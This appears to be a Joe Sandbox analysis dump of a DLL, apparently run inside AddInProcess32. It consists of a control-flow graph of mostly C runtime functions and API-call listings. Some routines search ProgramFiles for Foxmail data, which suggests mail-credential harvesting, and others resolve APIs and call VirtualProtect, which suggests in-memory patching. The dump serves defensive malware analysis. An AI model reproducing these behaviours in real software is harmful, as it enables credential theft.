GetLastError 7742->7743 7744 1000385f 7742->7744 7745 10003b67 ___vcrt_FlsGetValue 6 API calls 7743->7745 7744->7738 7746 10003877 7745->7746 7747 100038dc SetLastError 7746->7747 7748 10003ba2 ___vcrt_FlsSetValue 6 API calls 7746->7748 7753 10003896 7746->7753 7747->7738 7749 10003890 7748->7749 7750 100038b8 7749->7750 7751 10003ba2 ___vcrt_FlsSetValue 6 API calls 7749->7751 7749->7753 7752 10003ba2 ___vcrt_FlsSetValue 6 API calls 7750->7752 7750->7753 7751->7750 7752->7753 7753->7747 6129 1000281c 6132 10002882 6129->6132 6135 10003550 6132->6135 6134 1000282a 6136 1000358a 6135->6136 6137 1000355d 6135->6137 6136->6134 6137->6136 6138 100047e5 ___std_exception_copy 21 API calls 6137->6138 6139 1000357a 6138->6139 6139->6136 6141 1000544d 6139->6141 6142 1000545a 6141->6142 6144 10005468 6141->6144 6142->6144 6148 1000547f 6142->6148 6143 10006368 __dosmaperr 20 API calls 6145 10005470 6143->6145 6144->6143 6150 100062ac 6145->6150 6147 1000547a 6147->6136 6148->6147 6149 10006368 __dosmaperr 20 API calls 6148->6149 6149->6145 6153 10006231 6150->6153 6152 100062b8 6152->6147 6154 10005b7a _abort 20 API calls 6153->6154 6155 10006247 6154->6155 6156 10006255 6155->6156 6157 100062a6 6155->6157 6162 10002ada _ValidateLocalCookies 5 API calls 6156->6162 6164 100062bc IsProcessorFeaturePresent 6157->6164 6159 100062ab 6160 10006231 _abort 26 API calls 6159->6160 6161 100062b8 6160->6161 6161->6152 6163 1000627c 6162->6163 6163->6152 6165 100062c7 6164->6165 6168 100060e2 6165->6168 6169 100060fe ___scrt_fastfail 6168->6169 6170 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6169->6170 6173 100061fb ___scrt_fastfail 6170->6173 6171 10002ada _ValidateLocalCookies 5 API calls 6172 10006219 GetCurrentProcess TerminateProcess 6171->6172 6172->6159 6173->6171 7754 10004bdd 7755 10004c08 7754->7755 7756 10004bec 7754->7756 7758 10006d60 51 API calls 7755->7758 7756->7755 7757 10004bf2 7756->7757 7759 10006368 __dosmaperr 20 API calls 7757->7759 7760 10004c0f GetModuleFileNameA 7758->7760 7761 10004bf7 7759->7761 7762 10004c33 7760->7762 7763 100062ac _abort 26 API calls 7761->7763 7777 10004d01 7762->7777 7764 10004c01 7763->7764 7769 10004c72 7772 10004d01 38 API calls 7769->7772 7770 10004c66 7771 10006368 __dosmaperr 20 API calls 7770->7771 7776 10004c6b 7771->7776 7774 10004c88 7772->7774 7773 1000571e _free 20 API calls 7773->7764 7775 1000571e _free 20 API calls 7774->7775 7774->7776 7775->7776 7776->7773 7779 10004d26 7777->7779 7781 10004d86 7779->7781 7789 100070eb 7779->7789 7780 10004c50 7783 10004e76 7780->7783 7781->7780 7782 100070eb 38 API calls 7781->7782 7782->7781 7784 10004e8b 7783->7784 7785 10004c5d 7783->7785 7784->7785 7786 1000637b _abort 20 API calls 7784->7786 7785->7769 7785->7770 7787 10004eb9 7786->7787 7788 1000571e _free 20 API calls 7787->7788 7788->7785 7792 10007092 7789->7792 7793 100054a7 __fassign 38 API calls 7792->7793 7794 100070a6 7793->7794 7794->7779 7153 10007260 GetStartupInfoW 7154 10007286 7153->7154 7156 10007318 7153->7156 7154->7156 7159 10008be3 7154->7159 7157 100072af 7157->7156 7158 100072dd GetFileType 7157->7158 7158->7157 7160 10008bef ___scrt_is_nonwritable_in_current_image 7159->7160 7161 10008c13 7160->7161 7162 10008bfc 7160->7162 7172 10005671 RtlEnterCriticalSection 7161->7172 7163 10006368 __dosmaperr 20 API calls 7162->7163 7165 10008c01 7163->7165 7166 100062ac _abort 26 API calls 7165->7166 7167 10008c0b _abort 7166->7167 7167->7157 7168 10008c4b 7180 10008c72 7168->7180 7170 10008c1f 7170->7168 7173 10008b34 7170->7173 7172->7170 7174 1000637b _abort 20 API calls 7173->7174 7175 10008b46 7174->7175 7178 10005eb7 11 API calls 7175->7178 7179 10008b53 7175->7179 7176 1000571e _free 20 API calls 7177 10008ba5 7176->7177 7177->7170 7178->7175 7179->7176 7183 100056b9 RtlLeaveCriticalSection 7180->7183 7182 10008c79 7182->7167 7183->7182 7447 100081a0 7448 100081d9 7447->7448 7449 100081dd 7448->7449 7460 10008205 7448->7460 7450 10006368 __dosmaperr 20 API calls 7449->7450 7451 100081e2 7450->7451 7453 100062ac _abort 26 API calls 7451->7453 7452 10008529 7454 10002ada _ValidateLocalCookies 5 API calls 7452->7454 7455 100081ed 7453->7455 7456 10008536 7454->7456 7457 10002ada _ValidateLocalCookies 5 API calls 7455->7457 7459 100081f9 7457->7459 7460->7452 7461 100080c0 7460->7461 7462 100080db 7461->7462 7463 10002ada _ValidateLocalCookies 5 API calls 7462->7463 7464 10008152 7463->7464 7464->7460 7795 1000a1e0 7798 1000a1fe 7795->7798 7797 1000a1f6 7800 1000a203 7798->7800 7799 1000aa53 21 API calls 7802 1000a42f 7799->7802 7800->7799 7801 1000a298 7800->7801 7801->7797 7802->7797 7184 10009d61 7185 10009d81 7184->7185 7188 10009db8 7185->7188 7187 10009dab 7190 10009dbf 7188->7190 7189 10009e20 7191 1000a90e 7189->7191 7192 1000aa17 21 API calls 7189->7192 7190->7189 7194 10009ddf 7190->7194 7191->7187 7193 10009e6e 7192->7193 7193->7187 7194->7191 7195 1000aa17 21 API calls 7194->7195 7196 1000a93e 7195->7196 7196->7187 7465 100021a1 ___scrt_dllmain_exception_filter 5825 1000c7a7 5826 1000c7be 5825->5826 5830 1000c82c 5825->5830 5826->5830 5837 1000c7e6 GetModuleHandleA 5826->5837 5828 1000c835 GetModuleHandleA 5831 1000c83f 5828->5831 5829 1000c872 5830->5828 5830->5829 5830->5831 5831->5830 5832 1000c85f GetProcAddress 5831->5832 5832->5830 5833 1000c7dd 5833->5830 5833->5831 5834 1000c800 GetProcAddress 5833->5834 5834->5830 5835 1000c80d VirtualProtect 5834->5835 5835->5830 5836 1000c81c VirtualProtect 5835->5836 5836->5830 5838 1000c7ef 5837->5838 5846 1000c82c 5837->5846 5849 1000c803 GetProcAddress 5838->5849 5840 1000c7f4 5843 1000c800 GetProcAddress 5840->5843 5840->5846 5841 1000c872 5842 1000c835 GetModuleHandleA 5845 1000c83f 5842->5845 5844 1000c80d VirtualProtect 5843->5844 5843->5846 5844->5846 5847 1000c81c VirtualProtect 5844->5847 5845->5846 5848 1000c85f GetProcAddress 5845->5848 5846->5841 5846->5842 5846->5845 5847->5846 5848->5846 5850 1000c82c 5849->5850 5851 1000c80d VirtualProtect 5849->5851 5853 1000c872 5850->5853 5854 1000c835 GetModuleHandleA 5850->5854 5851->5850 5852 1000c81c VirtualProtect 5851->5852 5852->5850 5856 1000c83f 5854->5856 5855 1000c85f GetProcAddress 5855->5856 5856->5850 5856->5855 6174 1000742b 6175 10007430 6174->6175 6176 10007453 6175->6176 6178 10008bae 6175->6178 6179 10008bdd 6178->6179 6180 10008bbb 6178->6180 6179->6175 6181 10008bd7 6180->6181 6182 10008bc9 RtlDeleteCriticalSection 6180->6182 6183 1000571e _free 20 API calls 6181->6183 6182->6181 6182->6182 6183->6179 7197 1000ac6b 7198 1000ac84 __startOneArgErrorHandling 7197->7198 7200 1000acad __startOneArgErrorHandling 7198->7200 7201 1000b2f0 7198->7201 7202 1000b329 __startOneArgErrorHandling 7201->7202 7203 1000b5c1 __raise_exc RaiseException 7202->7203 7204 1000b350 __startOneArgErrorHandling 7202->7204 7203->7204 7205 1000b393 7204->7205 7206 1000b36e 7204->7206 7207 1000b8b2 __startOneArgErrorHandling 20 API calls 7205->7207 7212 1000b8e1 7206->7212 7209 1000b38e __startOneArgErrorHandling 7207->7209 7210 10002ada _ValidateLocalCookies 5 API calls 7209->7210 7211 1000b3b7 7210->7211 7211->7200 7213 1000b8f0 7212->7213 7214 1000b90f __startOneArgErrorHandling 7213->7214 7215 1000b964 __startOneArgErrorHandling 7213->7215 7216 100078a3 __startOneArgErrorHandling 5 API calls 7214->7216 7217 1000b8b2 __startOneArgErrorHandling 20 API calls 7215->7217 7218 1000b950 7216->7218 7220 1000b95d 7217->7220 7219 1000b8b2 __startOneArgErrorHandling 20 API calls 7218->7219 7218->7220 7219->7220 7220->7209 7466 100060ac 7467 100060b7 7466->7467 7469 100060dd 7466->7469 7468 100060c7 FreeLibrary 7467->7468 7467->7469 7468->7467 7221 1000506f 7222 10005081 7221->7222 7223 10005087 7221->7223 7224 10005000 20 API calls 7222->7224 7224->7223 6184 10005630 6185 1000563b 6184->6185 6187 10005664 6185->6187 6189 10005660 6185->6189 6190 10005eb7 6185->6190 6197 10005688 6187->6197 6191 10005c45 _abort 5 API calls 6190->6191 6192 10005ede 6191->6192 6193 10005efc InitializeCriticalSectionAndSpinCount 6192->6193 6195 10005ee7 6192->6195 6193->6195 6194 10002ada _ValidateLocalCookies 5 API calls 6196 10005f13 6194->6196 6195->6194 6196->6185 6198 100056b4 6197->6198 6199 10005695 6197->6199 6198->6189 6200 1000569f RtlDeleteCriticalSection 6199->6200 6200->6198 6200->6200 7225 10003370 7236 10003330 7225->7236 7237 10003342 7236->7237 7238 1000334f 7236->7238 7239 10002ada _ValidateLocalCookies 5 API calls 7237->7239 7239->7238 7803 100063f0 7804 10006400 7803->7804 7807 10006416 7803->7807 7805 10006368 __dosmaperr 20 API calls 7804->7805 7806 10006405 7805->7806 7809 100062ac _abort 26 API calls 7806->7809 7810 10006480 7807->7810 7815 10006561 7807->7815 7822 10006580 7807->7822 7808 10004e76 20 API calls 7811 100064e5 7808->7811 7817 1000640f 7809->7817 7810->7808 7813 100064ee 7811->7813 7819 10006573 7811->7819 7833 100085eb 7811->7833 7814 1000571e _free 20 API calls 7813->7814 7814->7815 7842 1000679a 7815->7842 7820 100062bc _abort 11 API calls 7819->7820 7821 1000657f 7820->7821 7823 1000658c 7822->7823 7823->7823 7824 1000637b _abort 20 API calls 7823->7824 7825 100065ba 7824->7825 7826 100085eb 26 API calls 7825->7826 7827 100065e6 7826->7827 7828 100062bc _abort 11 API calls 7827->7828 7829 10006615 ___scrt_fastfail 7828->7829 7830 100066b6 FindFirstFileExA 7829->7830 7831 10006705 7830->7831 7832 10006580 26 API calls 7831->7832 7836 1000853a 7833->7836 7834 1000854f 7835 10006368 __dosmaperr 20 API calls 7834->7835 7837 10008554 7834->7837 7841 1000857a 7835->7841 7836->7834 7836->7837 7839 1000858b 7836->7839 7837->7811 7838 100062ac _abort 26 API calls 7838->7837 7839->7837 7840 10006368 __dosmaperr 20 API calls 7839->7840 7840->7841 7841->7838 7843 100067a4 7842->7843 7844 100067b4 7843->7844 7845 1000571e _free 20 API calls 7843->7845 7846 1000571e _free 20 API calls 7844->7846 7845->7843 7847 100067bb 7846->7847 7847->7817 7240 10009e71 7241 10009e95 7240->7241 7242 10009ee6 7241->7242 7244 10009f71 __startOneArgErrorHandling 7241->7244 7245 10009ef8 7242->7245 7248 1000aa53 7242->7248 7246 1000b2f0 21 API calls 7244->7246 7247 1000acad __startOneArgErrorHandling 7244->7247 7246->7247 7249 1000aa70 RtlDecodePointer 7248->7249 7250 1000aa80 7248->7250 7249->7250 7251 1000ab0d 7250->7251 7254 1000ab02 7250->7254 7256 1000aab7 7250->7256 7251->7254 7255 10006368 __dosmaperr 20 API calls 7251->7255 7252 10002ada _ValidateLocalCookies 5 API calls 7253 1000ac67 7252->7253 7253->7245 7254->7252 7255->7254 7256->7254 7257 10006368 __dosmaperr 20 API calls 7256->7257 7257->7254 7474 10003eb3 7475 10005411 38 API calls 7474->7475 7476 10003ebb 7475->7476 6201 1000543d 6202 10005440 6201->6202 6205 100055a8 6202->6205 6216 10007613 6205->6216 6208 100055b8 6210 100055c2 IsProcessorFeaturePresent 6208->6210 6215 100055e0 6208->6215 6212 100055cd 6210->6212 6213 100060e2 _abort 8 API calls 6212->6213 6213->6215 6246 10004bc1 6215->6246 6249 10007581 6216->6249 6219 1000766e 6220 1000767a _abort 6219->6220 6221 10005b7a _abort 20 API calls 6220->6221 6225 100076a7 _abort 6220->6225 6227 100076a1 _abort 6220->6227 6221->6227 6222 100076f3 6223 10006368 __dosmaperr 20 API calls 6222->6223 6224 100076f8 6223->6224 6228 100062ac _abort 26 API calls 6224->6228 6231 1000771f 6225->6231 6263 10005671 RtlEnterCriticalSection 6225->6263 6227->6222 6227->6225 6245 100076d6 6227->6245 6228->6245 6232 1000777e 6231->6232 6234 10007776 6231->6234 6242 100077a9 6231->6242 6264 100056b9 RtlLeaveCriticalSection 6231->6264 6232->6242 6265 10007665 6232->6265 6237 10004bc1 _abort 28 API calls 6234->6237 6237->6232 6241 10007665 _abort 38 API calls 6241->6242 6268 1000782e 6242->6268 6243 1000780c 6244 10005af6 _abort 38 API calls 6243->6244 6243->6245 6244->6245 6292 1000bdc9 6245->6292 6296 1000499b 6246->6296 6252 10007527 6249->6252 6251 100055ad 6251->6208 6251->6219 6253 10007533 ___scrt_is_nonwritable_in_current_image 6252->6253 6258 10005671 RtlEnterCriticalSection 6253->6258 6255 10007541 6259 10007575 6255->6259 6257 10007568 _abort 6257->6251 6258->6255 6262 100056b9 RtlLeaveCriticalSection 6259->6262 6261 1000757f 6261->6257 6262->6261 6263->6231 6264->6234 6266 10005af6 _abort 38 API calls 6265->6266 6267 1000766a 6266->6267 6267->6241 6269 10007834 6268->6269 6270 100077fd 6268->6270 6295 100056b9 RtlLeaveCriticalSection 6269->6295 6270->6243 6270->6245 6272 10005af6 GetLastError 6270->6272 6273 10005b12 6272->6273 6274 10005b0c 6272->6274 6276 1000637b _abort 20 API calls 6273->6276 6278 10005b61 SetLastError 6273->6278 6275 10005e08 _abort 11 API calls 6274->6275 6275->6273 6277 10005b24 6276->6277 6279 10005b2c 6277->6279 6280 10005e5e _abort 11 API calls 6277->6280 6278->6243 6281 1000571e _free 20 API calls 6279->6281 6282 10005b41 6280->6282 6283 10005b32 6281->6283 6282->6279 6284 10005b48 6282->6284 6286 10005b6d SetLastError 6283->6286 6285 1000593c _abort 20 API calls 6284->6285 6287 10005b53 6285->6287 6288 100055a8 _abort 35 API calls 6286->6288 6289 1000571e _free 20 API calls 6287->6289 6290 10005b79 6288->6290 6291 10005b5a 6289->6291 6291->6278 6291->6286 6293 10002ada _ValidateLocalCookies 5 API calls 6292->6293 6294 1000bdd4 6293->6294 6294->6294 6295->6270 6297 100049a7 _abort 6296->6297 6304 100049bf 6297->6304 6318 10004af5 GetModuleHandleW 6297->6318 6301 10004a65 6335 10004aa5 6301->6335 6327 10005671 RtlEnterCriticalSection 6304->6327 6306 10004a3c 6308 10004a54 6306->6308 6331 10004669 6306->6331 6307 100049c7 6307->6301 6307->6306 6328 1000527a 6307->6328 6314 10004669 _abort 5 API calls 6308->6314 6309 10004a82 6338 10004ab4 6309->6338 6310 10004aae 6312 1000bdc9 _abort 5 API calls 6310->6312 6317 10004ab3 6312->6317 6314->6301 6319 100049b3 6318->6319 6319->6304 6320 10004b39 GetModuleHandleExW 6319->6320 6321 10004b63 GetProcAddress 6320->6321 6322 10004b78 6320->6322 6321->6322 6323 10004b95 6322->6323 6324 10004b8c FreeLibrary 6322->6324 6325 10002ada _ValidateLocalCookies 5 API calls 6323->6325 6324->6323 6326 10004b9f 6325->6326 6326->6304 6327->6307 6346 10005132 6328->6346 6332 10004698 6331->6332 6333 10002ada _ValidateLocalCookies 5 API calls 6332->6333 6334 100046c1 6333->6334 6334->6308 6368 100056b9 RtlLeaveCriticalSection 6335->6368 6337 10004a7e 6337->6309 6337->6310 6369 10006025 6338->6369 6341 10004ae2 6344 10004b39 _abort 8 API calls 6341->6344 6342 10004ac2 GetPEB 6342->6341 6343 10004ad2 GetCurrentProcess TerminateProcess 6342->6343 6343->6341 6345 10004aea ExitProcess 6344->6345 6349 100050e1 6346->6349 6348 10005156 6348->6306 6350 100050ed ___scrt_is_nonwritable_in_current_image 6349->6350 6357 10005671 RtlEnterCriticalSection 6350->6357 6352 100050fb 6358 1000515a 6352->6358 6356 10005119 _abort 6356->6348 6357->6352 6361 10005182 6358->6361 6362 1000517a 6358->6362 6359 10002ada _ValidateLocalCookies 5 API calls 6360 10005108 6359->6360 6364 10005126 6360->6364 6361->6362 6363 1000571e _free 20 API calls 6361->6363 6362->6359 6363->6362 6367 100056b9 RtlLeaveCriticalSection 6364->6367 6366 10005130 6366->6356 6367->6366 6368->6337 6370 10006040 6369->6370 6371 1000604a 6369->6371 6373 10002ada _ValidateLocalCookies 5 API calls 6370->6373 6372 10005c45 _abort 5 API calls 6371->6372 6372->6370 6374 10004abe 6373->6374 6374->6341 6374->6342 6375 10001f3f 6376 10001f4b ___scrt_is_nonwritable_in_current_image 6375->6376 6393 1000247c 6376->6393 6378 10001f52 6379 10002041 6378->6379 6380 10001f7c 6378->6380 6387 10001f57 ___scrt_is_nonwritable_in_current_image 6378->6387 6416 10002639 IsProcessorFeaturePresent 6379->6416 6404 100023de 6380->6404 6383 10002048 6384 10001f8b __RTC_Initialize 6384->6387 6407 100022fc RtlInitializeSListHead 6384->6407 6386 10001f99 ___scrt_initialize_default_local_stdio_options 6408 100046c5 6386->6408 6391 10001fb8 6391->6387 6392 10004669 _abort 5 API calls 6391->6392 6392->6387 6394 10002485 6393->6394 6420 10002933 IsProcessorFeaturePresent 6394->6420 6398 1000249a 6398->6378 6399 10002496 6399->6398 6431 100053c8 6399->6431 6402 100024b1 6402->6378 6505 100024b5 6404->6505 6406 100023e5 6406->6384 6407->6386 6409 100046dc 6408->6409 6410 10002ada _ValidateLocalCookies 5 API calls 6409->6410 6411 10001fad 6410->6411 6411->6387 6412 100023b3 6411->6412 6413 100023b8 ___scrt_release_startup_lock 6412->6413 6414 10002933 ___isa_available_init IsProcessorFeaturePresent 6413->6414 6415 100023c1 6413->6415 6414->6415 6415->6391 6417 1000264e ___scrt_fastfail 6416->6417 6418 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6417->6418 6419 10002744 ___scrt_fastfail 6418->6419 6419->6383 6421 10002491 6420->6421 6422 100034ea 6421->6422 6423 100034ef ___vcrt_initialize_winapi_thunks 6422->6423 6442 10003936 6423->6442 6427 10003505 6428 10003510 6427->6428 6456 10003972 6427->6456 6428->6399 6430 100034fd 6430->6399 6497 10007457 6431->6497 6434 10003529 6435 10003532 6434->6435 6436 10003543 6434->6436 6437 1000391b ___vcrt_uninitialize_ptd 6 API calls 6435->6437 6436->6398 6438 10003537 6437->6438 6439 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6438->6439 6440 1000353c 6439->6440 6501 10003c50 6440->6501 6443 1000393f 6442->6443 6445 10003968 6443->6445 6446 100034f9 6443->6446 6460 10003be0 6443->6460 6447 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6445->6447 6446->6430 6448 100038e8 6446->6448 6447->6446 6478 10003af1 6448->6478 6451 100038fd 6451->6427 6454 10003918 6454->6427 6457 1000399c 6456->6457 6458 1000397d 6456->6458 6457->6430 6459 10003987 RtlDeleteCriticalSection 6458->6459 6459->6457 6459->6459 6465 10003a82 6460->6465 6462 10003bfa 6463 10003c18 InitializeCriticalSectionAndSpinCount 6462->6463 6464 10003c03 6462->6464 6463->6464 6464->6443 6466 10003aaa 6465->6466 6470 10003aa6 __crt_fast_encode_pointer 6465->6470 6466->6470 6471 100039be 6466->6471 6469 10003ac4 GetProcAddress 6469->6470 6470->6462 6476 100039cd try_get_first_available_module 6471->6476 6472 10003a77 6472->6469 6472->6470 6473 100039ea LoadLibraryExW 6474 10003a05 GetLastError 6473->6474 6473->6476 6474->6476 6475 10003a60 FreeLibrary 6475->6476 6476->6472 6476->6473 6476->6475 6477 10003a38 LoadLibraryExW 6476->6477 6477->6476 6479 10003a82 try_get_function 5 API calls 6478->6479 6480 10003b0b 6479->6480 6481 10003b24 TlsAlloc 6480->6481 6482 100038f2 6480->6482 6482->6451 6483 10003ba2 6482->6483 6484 10003a82 try_get_function 5 API calls 6483->6484 6485 10003bbc 6484->6485 6486 10003bd7 TlsSetValue 6485->6486 6487 1000390b 6485->6487 6486->6487 6487->6454 6488 1000391b 6487->6488 6489 1000392b 6488->6489 6490 10003925 6488->6490 6489->6451 6492 10003b2c 6490->6492 6493 10003a82 try_get_function 5 API calls 6492->6493 6494 10003b46 6493->6494 6495 10003b5e TlsFree 6494->6495 6496 10003b52 6494->6496 6495->6496 6496->6489 6500 10007470 6497->6500 6498 10002ada _ValidateLocalCookies 5 API calls 6499 100024a3 6498->6499 6499->6402 6499->6434 6500->6498 6502 10003c7f 6501->6502 6503 10003c59 6501->6503 6502->6436 6503->6502 6504 10003c69 FreeLibrary 6503->6504 6504->6503 6506 100024c4 6505->6506 6507 100024c8 6505->6507 6506->6406 6508 10002639 ___scrt_fastfail 4 API calls 6507->6508 6510 100024d5 ___scrt_release_startup_lock 6507->6510 6509 10002559 6508->6509 6510->6406 7477 100067bf 7482 100067f4 7477->7482 7480 100067db 7481 1000571e _free 20 API calls 7481->7480 7483 10006806 7482->7483 7492 100067cd 7482->7492 7484 10006836 7483->7484 7485 1000680b 7483->7485 7484->7492 7493 100071d6 7484->7493 7486 1000637b _abort 20 API calls 7485->7486 7488 10006814 7486->7488 7489 1000571e _free 20 API calls 7488->7489 7489->7492 7490 10006851 7491 1000571e _free 20 API calls 7490->7491 7491->7492 7492->7480 7492->7481 7494 100071e1 7493->7494 7495 10007209 7494->7495 7496 100071fa 7494->7496 7499 10007218 7495->7499 7502 10008a98 7495->7502 7497 10006368 __dosmaperr 20 API calls 7496->7497 7501 100071ff ___scrt_fastfail 7497->7501 7509 10008acb 7499->7509 7501->7490 7503 10008aa3 7502->7503 7504 10008ab8 RtlSizeHeap 7502->7504 7505 10006368 __dosmaperr 20 API calls 7503->7505 7504->7499 7506 10008aa8 7505->7506 7507 100062ac _abort 26 API calls 7506->7507 7508 10008ab3 7507->7508 7508->7499 7510 10008ae3 7509->7510 7511 10008ad8 7509->7511 7513 10008aeb 7510->7513 7519 10008af4 _abort 7510->7519 7512 100056d0 21 API calls 7511->7512 7518 10008ae0 7512->7518 7516 1000571e _free 20 API calls 7513->7516 7514 10008af9 7517 10006368 __dosmaperr 20 API calls 7514->7517 7515 10008b1e RtlReAllocateHeap 7515->7518 7515->7519 7516->7518 7517->7518 7518->7501 7519->7514 7519->7515 7520 1000474f _abort 7 API calls 7519->7520 7520->7519 7848 10005bff 7856 10005d5c 7848->7856 7851 10005c13 7852 10005b7a _abort 20 API calls 7853 10005c1b 7852->7853 7854 10005c28 7853->7854 7855 10005c2b 11 API calls 7853->7855 7855->7851 7857 10005c45 _abort 5 API calls 7856->7857 7858 10005d83 7857->7858 7859 10005d9b TlsAlloc 7858->7859 7860 10005d8c 7858->7860 7859->7860 7861 10002ada _ValidateLocalCookies 5 API calls 7860->7861 7862 10005c09 7861->7862 7862->7851 7862->7852

                                                      Control-flow Graph

                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                      • FindClose.KERNEL32(00000000), ref: 100011DB
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                      • String ID:
                                                      • API String ID: 1083526818-0
                                                      • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                      • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                      • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                      • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                      Control-flow Graph

                                                      APIs
                                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                        • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                        • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                        • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                        • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                      • lstrlenW.KERNEL32(?), ref: 100014C5
                                                      • lstrlenW.KERNEL32(?), ref: 100014E0
                                                      • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                      • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                      • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                      • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                      • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                      • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                      • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                      • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                      • String ID: )$Foxmail$ProgramFiles
                                                      • API String ID: 672098462-2938083778
                                                      • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                      • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                      • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                      • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                      Control-flow Graph

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                        • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                        • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                        • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.2937213411.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000010.00000002.2937108954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000010.00000002.2937213411.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_10000000_AddInProcess32.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                      • String ID:
                                                      • API String ID: 2099061454-0
                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                      • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                      • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
